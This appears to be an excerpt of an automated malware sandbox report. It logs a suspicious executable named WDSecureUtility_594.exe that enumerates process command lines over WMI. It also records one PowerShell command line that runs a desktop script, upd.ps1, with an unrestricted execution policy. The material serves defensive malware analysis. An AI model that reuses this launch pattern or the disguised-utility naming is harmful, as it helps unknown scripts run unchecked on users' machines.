            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2092
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3384
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2520
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 364
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6828
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1224
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6824
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1648
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1216
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 784
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7048
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1212
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2072
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6812
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6580
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 776
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6808
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 772
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1200
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1660
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 324
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5100
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6348
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 744
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3736
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6040
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 736
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2028
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1596
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4612
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4608
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2020
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5896
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4600
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4168
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2012
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2872
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2440
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1572
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1140
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2428
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5012
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6732
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2420
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7160
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5424
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5432
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5860
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3704
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7300
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6128
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2924
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5852
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4984
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1100
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5856
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5836
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1092
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 660
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3676
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4968
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6896
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5496
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5392
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6248
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 640
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6240
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4084
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7100
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2788
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6372
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6216
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5800
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2780
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 624
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6452
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5124
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5356
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1476
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1044
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4916
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2328
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3620
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1032
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6200
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1888
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5764
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5328
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1448
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1876
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2304
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5320
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1008
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7040
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2728
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1000
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4016
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2720
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 564
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4436
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 556
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 984
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5344
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1412
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3564
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4856
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7560
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6388
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1404
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5708
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7000
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1392
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 960
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4404
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5264
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6556
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5692
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6552
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5256
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2668
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2236
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6544
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3956
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6972
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6968
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6104
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 928
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 492
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1352
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 920
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5660
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6520
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 484
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3068
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2204
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1716
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1768
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2628
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6072
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2620
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3908
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6492
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 888
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1748
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2608
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3468
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 92
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1740
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 868
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6036
            Source: C:\Users\user\AppData\Roaming\WDSecureUtility_594.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\upd.ps1"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
